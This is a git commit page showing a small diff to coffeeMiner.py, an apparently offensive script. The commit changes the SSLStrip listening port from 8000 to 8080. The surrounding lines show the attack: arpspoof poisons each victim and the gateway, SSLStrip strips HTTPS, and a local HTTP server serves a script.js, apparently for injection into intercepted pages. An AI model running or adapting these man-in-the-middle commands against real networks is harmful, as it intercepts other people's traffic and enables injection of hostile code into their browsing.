Browse Source

Fix: changed port 8000 to 8080 for SSLStrip

pull/7/head
Chase Taylor 7 years ago
parent
commit
0944679bbc
1 changed files with 2 additions and 2 deletions
  1. +2
    -2
      coffeeMiner.py

+ 2
- 2
coffeeMiner.py

@ -40,8 +40,8 @@ for victim in victims:
os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &") os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &")
os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &") os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &")
# run SSLStrip on port 8000
os.system("python sslstrip2/sslstrip.py -l 8000 &")
# run SSLStrip on port 8080
os.system("python sslstrip2/sslstrip.py -l 8080 &")
# start the http server for serving the script.js, in a new console # start the http server for serving the script.js, in a new console
os.system("xterm -hold -e 'python3 httpServer.py' &") os.system("xterm -hold -e 'python3 httpServer.py' &")

Loading…
Cancel
Save